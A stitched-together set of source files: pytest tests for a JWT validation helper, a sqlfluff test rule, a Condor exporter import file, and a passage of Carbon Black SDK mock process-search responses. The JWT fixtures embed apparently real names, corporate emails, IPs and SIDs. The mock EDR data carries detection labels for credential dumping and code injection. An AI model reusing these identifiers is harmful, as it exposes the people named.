assert str(exception_info.value) == "No upn (i.e. User ID) in JSON body."
def test_validation_failure(responses: RequestsMock):
responses.add(
responses.GET,
"https://test_id_provider",
json={
"keys": [
{
"kid": "SSQdhI1cKvhQEDSJxE2gGYs40Q0",
"x5c": [
"MIIDBTCCAe2gAwIBAgIQdEMOjSqDVbdN3mzb2IumCzANBgkqhkiG9w0BAQsFADAtMSswKQYDVQQDEyJhY2NvdW50cy5hY2Nlc3Njb250cm9sLndpbmRvd3MubmV0MB4XDTE5MDYwNDAwMDAwMFoXDTIxMDYwNDAwMDAwMFowLTErMCkGA1UEAxMiYWNjb3VudHMuYWNjZXNzY29udHJvbC53aW5kb3dzLm5ldDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAKEUUBvom99MdPXlrQ6S9MFmoQPoYI3NJVqEFOJcARY11dj3zyJogL8MTsTRt+DIJ8NyvYbgWC7K7zkAGzHQZhPJcM/AxSjFqh6qB98UqgxoSGBaG0A4lUZJHnKW3qx+YaiWrkg+z4sAwUkP0QgyI29Ejpkk6WUfe1rOJNc/defFUX+AVGxo81beLVAM/8tnCOSbF0H3IADwd76D/Hrp8RsGf4jPHr8N4VDsO/p7oj8rbOx0pL1ehjMK13zspmP8NO5mMcP9i5yiJ37FgbXESAxvja7I9t+y4LQYSu05M7la4Lqv//m5A8MBd6k0VxgF/Sq8GOIbkcQ0bJTCIN9B6oMCAwEAAaMhMB8wHQYDVR0OBBYEFNRP0Lf6MDeL11RDH0uL7H+/JqtLMA0GCSqGSIb3DQEBCwUAA4IBAQCJKR1nxp9Ij/yisCmDG7bdN1yHj/2HdVvyLfCCyReRfkB3cnTZVaIOBy5occGkdmsYJ+q8uqczkoCMAz3gvvq1c0msKEiNpqWNeU2aRXqyL3QZJ/GBmUK1I0tINPVv8j7znm0DcvHHXFvhzS8E4s8ai8vQkcpyac/7Z4PN43HtjDnkZo9Zxm7JahHshrhA8sSPvsuC4dQAcHbOrLbHG+HIo3Tq2pNl7mfQ9fVJ2FxbqlzPYr/rK8H2GTA6N55SuP3KTNvyL3RnMa3hXmGTdG1dpMFzD/IE623h/BqY6j29PyQC/+MUD4UCZ6KW9oIzpi27pKQagH1i1jpBU/ceH6AW"
],
}
]
},
)
expired = "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6IlNTUWRoSTFjS3ZoUUVEU0p4RTJnR1lzNDBRMCIsImtpZCI6IlNTUWRoSTFjS3ZoUUVEU0p4RTJnR1lzNDBRMCJ9.eyJhdWQiOiIyYmVmNzMzZC03NWJlLTQxNTktYjI4MC02NzJlMDU0OTM4YzMiLCJpc3MiOiJodHRwczovL3N0cy53aW5kb3dzLm5ldC8yNDEzOWQxNC1jNjJjLTRjNDctOGJkZC1jZTcxZWExZDUwY2YvIiwiaWF0IjoxNTIwMjcwNTAxLCJuYmYiOjE1MjAyNzA1MDEsImV4cCI6MTUyMDI3NDQwMSwiYWlvIjoiWTJOZ1lFaHlXMjYwVS9kR1RGeWNTMWNPVnczYnpqVXQ0Zk96TkNTekJYaWMyWTVOWFFNQSIsImFtciI6WyJwd2QiXSwiZmFtaWx5X25hbWUiOiJCb3Vub3VhciIsImdpdmVuX25hbWUiOiJDb2xpbiIsImlwYWRkciI6IjE5NC4yOS45OC4xNDQiLCJuYW1lIjoiQm91bm91YXIgQ29saW4gKEVOR0lFIEVuZXJneSBNYW5hZ2VtZW50KSIsIm5vbmNlIjoiW1x1MDAyNzczNjJDQUVBLTlDQTUtNEI0My05QkEzLTM0RDdDMzAzRUJBN1x1MDAyN10iLCJvaWQiOiJkZTZiOGVjYS01ZTEzLTRhZTEtODcyMS1mZGNmNmI0YTljZGQiLCJvbnByZW1fc2lkIjoiUy0xLTUtMjEtMTQwOTA4MjIzMy0xNDE3MDAxMzMzLTY4MjAwMzMzMC0zNzY5NTQiLCJzdWIiOiI2eEZSV1FBaElOZ0I4Vy10MnJRVUJzcElGc1VyUXQ0UUZ1V1VkSmRxWFdnIiwidGlkIjoiMjQxMzlkMTQtYzYyYy00YzQ3LThiZGQtY2U3MWVhMWQ1MGNmIiwidW5pcXVlX25hbWUiOiJKUzUzOTFAZW5naWUuY29tIiwidXBuIjoiSlM1MzkxQGVuZ2llLmNvbSIsInV0aSI6InVmM0x0X1Q5aWsyc0hGQ01oNklhQUEiLCJ2ZXIiOiIxLjAifQ.addwLSoO-2t1kXgljqnaU-P1hQGHQBiJMcNCLwELhBZT_vHvkZHFrmgfcTzED_AMdB9mTpvUm_Mk0d3F3RzLtyCeAApOPJaRAwccAc3PB1pKTwjFhdzIXtxib0_MQ6_F1fhb8R8ZcLCbwhMtT8nXoeWJOvH9_71O_vkfOn6E-VwLo17jkvQJOa89KfctGNnHNMcPBBju0oIgp_UVal311SMUw_10i4GZZkjR2I1m7EMg5jMwQgUatYWv2J5HoefAQQDat9jJeEnYNITxsJMN81FHTyuvMnN_ulFzOGtcvlBpmP6jVHfEDoJiqFM4NFh6r4IlOs2U2-jUb_bR5xi2zg"
with pytest.raises(jwt.InvalidTokenError) as exception_info:
oauth2helper.validate(expired, "https://test_id_provider")
assert str(exception_info.value) == "Signature verification failed"
def test_validation_success_without_signature_check(responses: RequestsMock):
responses.add(
responses.GET,
"https://test_id_provider",
json={
"keys": [
{
"kid": "SSQdhI1cKvhQEDSJxE2gGYs40Q0",
"x5c": [
"MIIDBTCCAe2gAwIBAgIQdEMOjSqDVbdN3mzb2IumCzANBgkqhkiG9w0BAQsFADAtMSswKQYDVQQDEyJhY2NvdW50cy5hY2Nlc3Njb250cm9sLndpbmRvd3MubmV0MB4XDTE5MDYwNDAwMDAwMFoXDTIxMDYwNDAwMDAwMFowLTErMCkGA1UEAxMiYWNjb3VudHMuYWNjZXNzY29udHJvbC53aW5kb3dzLm5ldDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAKEUUBvom99MdPXlrQ6S9MFmoQPoYI3NJVqEFOJcARY11dj3zyJogL8MTsTRt+DIJ8NyvYbgWC7K7zkAGzHQZhPJcM/AxSjFqh6qB98UqgxoSGBaG0A4lUZJHnKW3qx+YaiWrkg+z4sAwUkP0QgyI29Ejpkk6WUfe1rOJNc/defFUX+AVGxo81beLVAM/8tnCOSbF0H3IADwd76D/Hrp8RsGf4jPHr8N4VDsO/p7oj8rbOx0pL1ehjMK13zspmP8NO5mMcP9i5yiJ37FgbXESAxvja7I9t+y4LQYSu05M7la4Lqv//m5A8MBd6k0VxgF/Sq8GOIbkcQ0bJTCIN9B6oMCAwEAAaMhMB8wHQYDVR0OBBYEFNRP0Lf6MDeL11RDH0uL7H+/JqtLMA0GCSqGSIb3DQEBCwUAA4IBAQCJKR1nxp9Ij/yisCmDG7bdN1yHj/2HdVvyLfCCyReRfkB3cnTZVaIOBy5occGkdmsYJ+q8uqczkoCMAz3gvvq1c0msKEiNpqWNeU2aRXqyL3QZJ/GBmUK1I0tINPVv8j7znm0DcvHHXFvhzS8E4s8ai8vQkcpyac/7Z4PN43HtjDnkZo9Zxm7JahHshrhA8sSPvsuC4dQAcHbOrLbHG+HIo3Tq2pNl7mfQ9fVJ2FxbqlzPYr/rK8H2GTA6N55SuP3KTNvyL3RnMa3hXmGTdG1dpMFzD/IE623h/BqY6j29PyQC/+MUD4UCZ6KW9oIzpi27pKQagH1i1jpBU/ceH6AW"
],
}
]
},
)
expired = "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6IlNTUWRoSTFjS3ZoUUVEU0p4RTJnR1lzNDBRMCIsImtpZCI6IlNTUWRoSTFjS3ZoUUVEU0p4RTJnR1lzNDBRMCJ9.eyJhdWQiOiIyYmVmNzMzZC03NWJlLTQxNTktYjI4MC02NzJlMDU0OTM4YzMiLCJpc3MiOiJodHRwczovL3N0cy53aW5kb3dzLm5ldC8yNDEzOWQxNC1jNjJjLTRjNDctOGJkZC1jZTcxZWExZDUwY2YvIiwiaWF0IjoxNTIwMjcwNTAxLCJuYmYiOjE1MjAyNzA1MDEsImV4cCI6MTUyMDI3NDQwMSwiYWlvIjoiWTJOZ1lFaHlXMjYwVS9kR1RGeWNTMWNPVnczYnpqVXQ0Zk96TkNTekJYaWMyWTVOWFFNQSIsImFtciI6WyJwd2QiXSwiZmFtaWx5X25hbWUiOiJCb3Vub3VhciIsImdpdmVuX25hbWUiOiJDb2xpbiIsImlwYWRkciI6IjE5NC4yOS45OC4xNDQiLCJuYW1lIjoiQm91bm91YXIgQ29saW4gKEVOR0lFIEVuZXJneSBNYW5hZ2VtZW50KSIsIm5vbmNlIjoiW1x1MDAyNzczNjJDQUVBLTlDQTUtNEI0My05QkEzLTM0RDdDMzAzRUJBN1x1MDAyN10iLCJvaWQiOiJkZTZiOGVjYS01ZTEzLTRhZTEtODcyMS1mZGNmNmI0YTljZGQiLCJvbnByZW1fc2lkIjoiUy0xLTUtMjEtMTQwOTA4MjIzMy0xNDE3MDAxMzMzLTY4MjAwMzMzMC0zNzY5NTQiLCJzdWIiOiI2eEZSV1FBaElOZ0I4Vy10MnJRVUJzcElGc1VyUXQ0UUZ1V1VkSmRxWFdnIiwidGlkIjoiMjQxMzlkMTQtYzYyYy00YzQ3LThiZGQtY2U3MWVhMWQ1MGNmIiwidW5pcXVlX25hbWUiOiJKUzUzOTFAZW5naWUuY29tIiwidXBuIjoiSlM1MzkxQGVuZ2llLmNvbSIsInV0aSI6InVmM0x0X1Q5aWsyc0hGQ01oNklhQUEiLCJ2ZXIiOiIxLjAifQ.addwLSoO-2t1kXgljqnaU-P1hQGHQBiJMcNCLwELhBZT_vHvkZHFrmgfcTzED_AMdB9mTpvUm_Mk0d3F3RzLtyCeAApOPJaRAwccAc3PB1pKTwjFhdzIXtxib0_MQ6_F1fhb8R8ZcLCbwhMtT8nXoeWJOvH9_71O_vkfOn6E-VwLo17jkvQJOa89KfctGNnHNMcPBBju0oIgp_UVal311SMUw_10i4GZZkjR2I1m7EMg5jMwQgUatYWv2J5HoefAQQDat9jJeEnYNITxsJMN81FHTyuvMnN_ulFzOGtcvlBpmP6jVHfEDoJiqFM4NFh6r4IlOs2U2-jUb_bR5xi2zg"
json_header, json_body = oauth2helper.validate(
expired,
"https://test_id_provider",
verify_signature=False,
verify_exp=False,
algorithms=["RS256"],
)
assert json_header == {
"alg": "RS256",
"kid": "SSQdhI1cKvhQEDSJxE2gGYs40Q0",
"typ": "JWT",
"x5t": "SSQdhI1cKvhQEDSJxE2gGYs40Q0",
}
assert json_body == {
"aio": "Y2NgYEhyW260U/dGTFycS1cOVw3bzjUt4fOzNCSzBXic2Y5NXQMA",
"amr": ["pwd"],
"aud": "2bef733d-75be-4159-b280-672e054938c3",
"exp": 1520274401,
"family_name": "Bounouar",
"given_name": "Colin",
"iat": 1520270501,
"ipaddr": "194.29.98.144",
"iss": "https://sts.windows.net/24139d14-c62c-4c47-8bdd-ce71ea1d50cf/",
"name": "Bounouar Colin (ENGIE Energy Management)",
"nbf": 1520270501,
"nonce": "['7362CAEA-9CA5-4B43-9BA3-34D7C303EBA7']",
"oid": "de6b8eca-5e13-4ae1-8721-fdcf6b4a9cdd",
"onprem_sid": "S-1-5-21-1409082233-1417001333-682003330-376954",
"sub": "6xFRWQAhINgB8W-t2rQUBspIFsUrQt4QFuWUdJdqXWg",
"tid": "24139d14-c62c-4c47-8bdd-ce71ea1d50cf",
"unique_name": "JS5391@engie.com",
"upn": "JS5391@engie.com",
"uti": "uf3Lt_T9ik2sHFCMh6IaAA",
"ver": "1.0",
}
def test_content_extraction():
json_body = {"name": "Test name", "upn": "user@email"}
assert oauth2helper.user_name(json_body) == "user"
assert "Test name" == oauth2helper.get(json_body, "name")
def test_content_extraction_missing_key():
with pytest.raises(jwt.InvalidTokenError) as exception_info:
oauth2helper.get({}, "qsdfqsdfqsdf")
assert "No qsdfqsdfqsdf in JSON body." == str(exception_info.value)
def test_invalid_kid(responses: RequestsMock):
responses.add(
responses.GET,
"https://test_id_provider",
json={
"keys": [
{
"kid": "u4OfNFPHwEBosHjtrauObV84LnY",
"x5c": [
"MIIDBTCCAe2gAwIBAgIQdEMOjSqDVbdN3mzb2IumCzANBgkqhkiG9w0BAQsFADAtMSswKQYDVQQDEyJhY2NvdW50cy5hY2Nlc3Njb250cm9sLndpbmRvd3MubmV0MB4XDTE5MDYwNDAwMDAwMFoXDTIxMDYwNDAwMDAwMFowLTErMCkGA1UEAxMiYWNjb3VudHMuYWNjZXNzY29udHJvbC53aW5kb3dzLm5ldDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAKEUUBvom99MdPXlrQ6S9MFmoQPoYI3NJVqEFOJcARY11dj3zyJogL8MTsTRt+DIJ8NyvYbgWC7K7zkAGzHQZhPJcM/AxSjFqh6qB98UqgxoSGBaG0A4lUZJHnKW3qx+YaiWrkg+z4sAwUkP0QgyI29Ejpkk6WUfe1rOJNc/defFUX+AVGxo81beLVAM/8tnCOSbF0H3IADwd76D/Hrp8RsGf4jPHr8N4VDsO/p7oj8rbOx0pL1ehjMK13zspmP8NO5mMcP9i5yiJ37FgbXESAxvja7I9t+y4LQYSu05M7la4Lqv//m5A8MBd6k0VxgF/Sq8GOIbkcQ0bJTCIN9B6oMCAwEAAaMhMB8wHQYDVR0OBBYEFNRP0Lf6MDeL11RDH0uL7H+/JqtLMA0GCSqGSIb3DQEBCwUAA4IBAQCJKR1nxp9Ij/yisCmDG7bdN1yHj/2HdVvyLfCCyReRfkB3cnTZVaIOBy5occGkdmsYJ+q8uqczkoCMAz3gvvq1c0msKEiNpqWNeU2aRXqyL3QZJ/GBmUK1I0tINPVv8j7znm0DcvHHXFvhzS8E4s8ai8vQkcpyac/7Z4PN43HtjDnkZo9Zxm7JahHshrhA8sSPvsuC4dQAcHbOrLbHG+HIo3Tq2pNl7mfQ9fVJ2FxbqlzPYr/rK8H2GTA6N55SuP3KTNvyL3RnMa3hXmGTdG1dpMFzD/IE623h/BqY6j29PyQC/+MUD4UCZ6KW9oIzpi27pKQagH1i1jpBU/ceH6AW"
],
},
{
"kid": "u4OfNFPHwEBosHjtrauObV84LnG",
"x5c": [
"MIIDBTCCAe2gAwIBAgIQdEMOjSqDVbdN3mzb2IumCzANBgkqhkiG9w0BAQsFADAtMSswKQYDVQQDEyJhY2NvdW50cy5hY2Nlc3Njb250cm9sLndpbmRvd3MubmV0MB4XDTE5MDYwNDAwMDAwMFoXDTIxMDYwNDAwMDAwMFowLTErMCkGA1UEAxMiYWNjb3VudHMuYWNjZXNzY29udHJvbC53aW5kb3dzLm5ldDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAKEUUBvom99MdPXlrQ6S9MFmoQPoYI3NJVqEFOJcARY11dj3zyJogL8MTsTRt+DIJ8NyvYbgWC7K7zkAGzHQZhPJcM/AxSjFqh6qB98UqgxoSGBaG0A4lUZJHnKW3qx+YaiWrkg+z4sAwUkP0QgyI29Ejpkk6WUfe1rOJNc/defFUX+AVGxo81beLVAM/8tnCOSbF0H3IADwd76D/Hrp8RsGf4jPHr8N4VDsO/p7oj8rbOx0pL1ehjMK13zspmP8NO5mMcP9i5yiJ37FgbXESAxvja7I9t+y4LQYSu05M7la4Lqv//m5A8MBd6k0VxgF/Sq8GOIbkcQ0bJTCIN9B6oMCAwEAAaMhMB8wHQYDVR0OBBYEFNRP0Lf6MDeL11RDH0uL7H+/JqtLMA0GCSqGSIb3DQEBCwUAA4IBAQCJKR1nxp9Ij/yisCmDG7bdN1yHj/2HdVvyLfCCyReRfkB3cnTZVaIOBy5occGkdmsYJ+q8uqczkoCMAz3gvvq1c0msKEiNpqWNeU2aRXqyL3QZJ/GBmUK1I0tINPVv8j7znm0DcvHHXFvhzS8E4s8ai8vQkcpyac/7Z4PN43HtjDnkZo9Zxm7JahHshrhA8sSPvsuC4dQAcHbOrLbHG+HIo3Tq2pNl7mfQ9fVJ2FxbqlzPYr/rK8H2GTA6N55SuP3KTNvyL3RnMa3hXmGTdG1dpMFzD/IE623h/BqY6j29PyQC/+MUD4UCZ6KW9oIzpi27pKQagH1i1jpBU/ceH6AW"
],
},
]
},
)
expired = "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6ImEzUU4wQlpTN3M0bk4tQmRyamJGMFlfTGRNTSIsImtpZCI6ImEzUU4wQlpTN3M0bk4tQmRyamJGMFlfTGRNTSJ9.eyJhdWQiOiIyYmVmNzMzZC03NWJlLTQxNTktYjI4MC02NzJlMDU0OTM4YzMiLCJpc3MiOiJodHRwczovL3N0cy53aW5kb3dzLm5ldC8yNDEzOWQxNC1jNjJjLTRjNDctOGJkZC1jZTcxZWExZDUwY2YvIiwiaWF0IjoxNDkwNzc5NzEyLCJuYmYiOjE0OTA3Nzk3MTIsImV4cCI6MTQ5MDc4MzYxMiwiYW1yIjpbInB3ZCJdLCJmYW1pbHlfbmFtZSI6IkRlIE1hZXllciIsImdpdmVuX25hbWUiOiJGYWJyaWNlIiwiaXBhZGRyIjoiMTA0LjQ2LjU4LjE0OSIsIm5hbWUiOiJEZSBNYWV5ZXIgRmFicmljZSAoZXh0ZXJuYWwpIiwibm9uY2UiOiI3MzYyQ0FFQS05Q0E1LTRCNDMtOUJBMy0zNEQ3QzMwM0VCQTciLCJvaWQiOiI1YTJmOGQyYS0xNzQ1LTRmNTctOTcwYS03YjIwMzU5YWUyZGMiLCJvbnByZW1fc2lkIjoiUy0xLTUtMjEtMTQwOTA4MjIzMy0xNDE3MDAxMzMzLTY4MjAwMzMzMC0yODUxNjAiLCJwbGF0ZiI6IjMiLCJzdWIiOiJRcjhNZlAwQk9oRld3WlNoNFZSVEpYeGd3Z19XTFBId193TnBnS1lMQTJVIiwidGlkIjoiMjQxMzlkMTQtYzYyYy00YzQ3LThiZGQtY2U3MWVhMWQ1MGNmIiwidW5pcXVlX25hbWUiOiJCSUY1OTBAZW5naWUuY29tIiwidXBuIjoiQklGNTkwQGVuZ2llLmNvbSIsInZlciI6IjEuMCJ9.vZO7a5Vs0G_g92Bb00BPKcLuF9WmrqfLjwbLhz8xEe3OfqfthWHqh_jzf_Md88INc4ZuMqOMPhWZTZjQMgCACIpTiHDpFRkokZ-jqC09BaQSSjwV_27b-zy-m6CZcFtdUe10LIBQEqiL9JnZlVIrBgFqr49bKBvZKr3uuaoeiuR2XcC0U2klYkDr3CYIexX0w57lvD5Ow0xKkdWKYVswcJipenU9PP63R0wNXr-8cb-6PGIUzaQDREo-EuR2e3uShF9u5cagG7emt9fDmJr8eGxBJU9ppRoffJpuaYeJiIg1F_n0iK7hENnIjZVnHjFn46DZO-RPse8YZjd4YBuKsg"
with pytest.raises(jwt.InvalidTokenError) as exception_info:
oauth2helper.validate(expired, "https://test_id_provider")
assert (
str(exception_info.value)
== "a3QN0BZS7s4nN-BdrjbF0Y_LdMM is not a valid key identifier. Valid ones are ['u4OfNFPHwEBosHjtrauObV84LnY', 'u4OfNFPHwEBosHjtrauObV84LnG']."
)
def test_identity_provider_error(responses: RequestsMock):
responses.add(
responses.GET,
"https://test_id_provider",
status=500,
json={"error": "Test error."},
)
expired = "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6ImEzUU4wQlpTN3M0bk4tQmRyamJGMFlfTGRNTSIsImtpZCI6ImEzUU4wQlpTN3M0bk4tQmRyamJGMFlfTGRNTSJ9.eyJhdWQiOiIyYmVmNzMzZC03NWJlLTQxNTktYjI4MC02NzJlMDU0OTM4YzMiLCJpc3MiOiJodHRwczovL3N0cy53aW5kb3dzLm5ldC8yNDEzOWQxNC1jNjJjLTRjNDctOGJkZC1jZTcxZWExZDUwY2YvIiwiaWF0IjoxNDkwNzc5NzEyLCJuYmYiOjE0OTA3Nzk3MTIsImV4cCI6MTQ5MDc4MzYxMiwiYW1yIjpbInB3ZCJdLCJmYW1pbHlfbmFtZSI6IkRlIE1hZXllciIsImdpdmVuX25hbWUiOiJGYWJyaWNlIiwiaXBhZGRyIjoiMTA0LjQ2LjU4LjE0OSIsIm5hbWUiOiJEZSBNYWV5ZXIgRmFicmljZSAoZXh0ZXJuYWwpIiwibm9uY2UiOiI3MzYyQ0FFQS05Q0E1LTRCNDMtOUJBMy0zNEQ3QzMwM0VCQTciLCJvaWQiOiI1YTJmOGQyYS0xNzQ1LTRmNTctOTcwYS03YjIwMzU5YWUyZGMiLCJvbnByZW1fc2lkIjoiUy0xLTUtMjEtMTQwOTA4MjIzMy0xNDE3MDAxMzMzLTY4MjAwMzMzMC0yODUxNjAiLCJwbGF0ZiI6IjMiLCJzdWIiOiJRcjhNZlAwQk9oRld3WlNoNFZSVEpYeGd3Z19XTFBId193TnBnS1lMQTJVIiwidGlkIjoiMjQxMzlkMTQtYzYyYy00YzQ3LThiZGQtY2U3MWVhMWQ1MGNmIiwidW5pcXVlX25hbWUiOiJCSUY1OTBAZW5naWUuY29tIiwidXBuIjoiQklGNTkwQGVuZ2llLmNvbSIsInZlciI6IjEuMCJ9.vZO7a5Vs0G_g92Bb00BPKcLuF9WmrqfLjwbLhz8xEe3OfqfthWHqh_jzf_Md88INc4ZuMqOMPhWZTZjQMgCACIpTiHDpFRkokZ-jqC09BaQSSjwV_27b-zy-m6CZcFtdUe10LIBQEqiL9JnZlVIrBgFqr49bKBvZKr3uuaoeiuR2XcC0U2klYkDr3CYIexX0w57lvD5Ow0xKkdWKYVswcJipenU9PP63R0wNXr-8cb-6PGIUzaQDREo-EuR2e3uShF9u5cagG7emt9fDmJr8eGxBJU9ppRoffJpuaYeJiIg1F_n0iK7hENnIjZVnHjFn46DZO-RPse8YZjd4YBuKsg"
with pytest.raises(jwt.InvalidTokenError) as exception_info:
oauth2helper.validate(expired, "https://test_id_provider")
assert (
str(exception_info.value)
== 'Identify provider cannot be reached: {"error": "Test error."}'
)
| 83.698925
| 1,466
| 0.839543
| 737
| 15,568
| 17.542741
| 0.303935
| 0.022121
| 0.013613
| 0.016165
| 0.891871
| 0.88228
| 0.881197
| 0.877639
| 0.877639
| 0.867894
| 0
| 0.113898
| 0.106115
| 15,568
| 185
| 1,467
| 84.151351
| 0.815177
| 0
| 0
| 0.417722
| 0
| 0.025316
| 0.724692
| 0.657181
| 0
| 1
| 0
| 0
| 0.094937
| 1
| 0.082278
| false
| 0
| 0.025316
| 0
| 0.107595
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
3dc699d24d5957b9c19b7f0d479fc000a66cd954
| 89
|
py
|
Python
|
test/fixtures/rules/custom/L000.py
|
netlify/sqlfluff
|
6f22eb08a0701f41132ee4847ddf1a64ca79da80
|
[
"MIT"
] | 3,024
|
2020-10-01T11:03:51.000Z
|
2022-03-31T16:42:00.000Z
|
test/fixtures/rules/custom/L000.py
|
netlify/sqlfluff
|
6f22eb08a0701f41132ee4847ddf1a64ca79da80
|
[
"MIT"
] | 2,395
|
2020-09-30T12:59:21.000Z
|
2022-03-31T22:05:29.000Z
|
test/fixtures/rules/custom/L000.py
|
netlify/sqlfluff
|
6f22eb08a0701f41132ee4847ddf1a64ca79da80
|
[
"MIT"
] | 246
|
2020-10-02T17:08:03.000Z
|
2022-03-30T17:43:51.000Z
|
"""Test std rule import."""
class Rule_L000:
"""Test std rule import."""
pass
| 11.125
| 31
| 0.58427
| 12
| 89
| 4.25
| 0.583333
| 0.27451
| 0.431373
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.044776
| 0.247191
| 89
| 7
| 32
| 12.714286
| 0.716418
| 0.483146
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
3dc77bd555db9eb497f00036eb4a7970c2d7e502
| 204
|
py
|
Python
|
Dockerfiles/schedd-exporter/exporter/condor/__init__.py
|
ahmadalkhansa/kube-htc
|
a2fb8aa9e9ea25cddf03260f0b4863e8dcf53890
|
[
"Apache-2.0"
] | null | null | null |
Dockerfiles/schedd-exporter/exporter/condor/__init__.py
|
ahmadalkhansa/kube-htc
|
a2fb8aa9e9ea25cddf03260f0b4863e8dcf53890
|
[
"Apache-2.0"
] | 1
|
2021-04-23T10:36:38.000Z
|
2021-04-23T10:36:38.000Z
|
Dockerfiles/schedd-exporter/exporter/condor/__init__.py
|
ahmadalkhansa/kube-htc
|
a2fb8aa9e9ea25cddf03260f0b4863e8dcf53890
|
[
"Apache-2.0"
] | null | null | null |
from exporter.condor.CondorJob import CondorJob
from exporter.condor.CondorJobCluster import CondorJobCluster
from exporter.condor.CondorMachine import Machine
from exporter.condor.CondorSlot import Slot
| 40.8
| 61
| 0.882353
| 24
| 204
| 7.5
| 0.416667
| 0.266667
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.078431
| 204
| 4
| 62
| 51
| 0.957447
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
9adb5628a65c9551691ccdcb17674a132eed642e
| 105,530
|
py
|
Python
|
src/tests/unit/fixtures/platform/mock_process.py
|
rmcqueen-cb/carbon-black-cloud-sdk-python
|
5fbbe96fd6c2e97f0e13c4223ff5d6ee9b0ede43
|
[
"MIT"
] | null | null | null |
src/tests/unit/fixtures/platform/mock_process.py
|
rmcqueen-cb/carbon-black-cloud-sdk-python
|
5fbbe96fd6c2e97f0e13c4223ff5d6ee9b0ede43
|
[
"MIT"
] | null | null | null |
src/tests/unit/fixtures/platform/mock_process.py
|
rmcqueen-cb/carbon-black-cloud-sdk-python
|
5fbbe96fd6c2e97f0e13c4223ff5d6ee9b0ede43
|
[
"MIT"
] | null | null | null |
"""Mock responses for process queries."""
GET_PROCESS_RESP = {}
GET_PROCESS_VALIDATION_RESP = {
"valid": True,
"value_search_query": False
}
GET_PROCESS_VALIDATION_RESP_INVALID = {
"invalid_message": "Invalid Query Parameter",
"valid": False,
"value_search_query": False,
"invalid_trigger_offset": 0
}
POST_PROCESS_SEARCH_JOB_RESP = {
"job_id": "2c292717-80ed-4f0d-845f-779e09470920"
}
POST_TREE_SEARCH_JOB_RESP = {
"job_id": "ee158f11-4dfb-4ae2-8f1a-7707b712226d"
}
GET_TREE_SEARCH_JOB_RESP = {
"contacted": 34,
"completed": 34
}
GET_PROCESS_SEARCH_JOB_RESULTS_RESP = {
"results": [
{
"backend_timestamp": "2020-09-11T19:35:02.972Z",
"childproc_count": 0,
"crossproc_count": 787,
"device_external_ip": "192.168.0.1",
"device_group_id": 0,
"device_id": 1234567,
"device_internal_ip": "192.168.0.2",
"device_name": "Windows10Device",
"device_os": "WINDOWS",
"device_policy_id": 12345,
"device_timestamp": "2020-09-11T19:32:12.821Z",
"enriched": True,
"enriched_event_type": [
"INJECT_CODE",
"SYSTEM_API_CALL"
],
"event_type": [
"crossproc"
],
"filemod_count": 0,
"ingress_time": 1599852859660,
"legacy": True,
"modload_count": 1,
"netconn_count": 0,
"org_id": "test",
"parent_guid": "test-0002b226-00000001-00000000-1d6225bbba74c00procsearchparent",
"parent_hash": [
"9090e0e44e14709fb09b23b98572e0e61c810189e2de8f7156021bc81c3b1bb6",
"bccc12eb2ef644e662a63a023fb83f9b"
],
"parent_name": "c:\\windows\\system32\\services.exe",
"parent_pid": 644,
"process_cmdline": [
"\"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\""
],
"process_effective_reputation": "TRUSTED_WHITE_LIST",
"process_guid": "test-0034d5f2-00000ba0-00000000-1d68709850fe522getprocjobres",
"process_hash": [
"5920199e4fbfa47c1717b863814722148a353e54f8c10912cf1f991a1c86309d",
"c7084336325dc8eadfb1e8ff876921c4"
],
"process_name": "c:\\program files\\vmware\\vmware tools\\vmtoolsd.exe",
"process_pid": [
5653,
16139
],
"process_reputation": "TRUSTED_WHITE_LIST",
"process_username": [
"Username"
],
"regmod_count": 1,
"scriptload_count": 0,
"ttp": [
"ENUMERATE_PROCESSES",
"INJECT_CODE",
"MITRE_T1003_CREDENTIAL_DUMP",
"MITRE_T1005_DATA_FROM_LOCAL_SYS",
"MITRE_T1055_PROCESS_INJECT",
"MITRE_T1057_PROCESS_DISCOVERY",
"RAM_SCRAPING",
"READ_SECURITY_DATA"
]
}
],
"num_found": 616,
"num_available": 1,
"contacted": 45,
"completed": 45
}
GET_PROCESS_SEARCH_JOB_RESULTS_RESP_ZERO = {
"results": [],
"num_found": 616,
"num_available": 1,
"contacted": 0,
"completed": 0
}
GET_PROCESS_SEARCH_JOB_RESULTS_RESP_STILL_QUERYING = {
"results": [],
"num_found": 616,
"num_available": 1,
"contacted": 10,
"completed": 0
}
GET_PROCESS_SEARCH_JOB_RESULTS_RESP_1 = {
"results": [
{
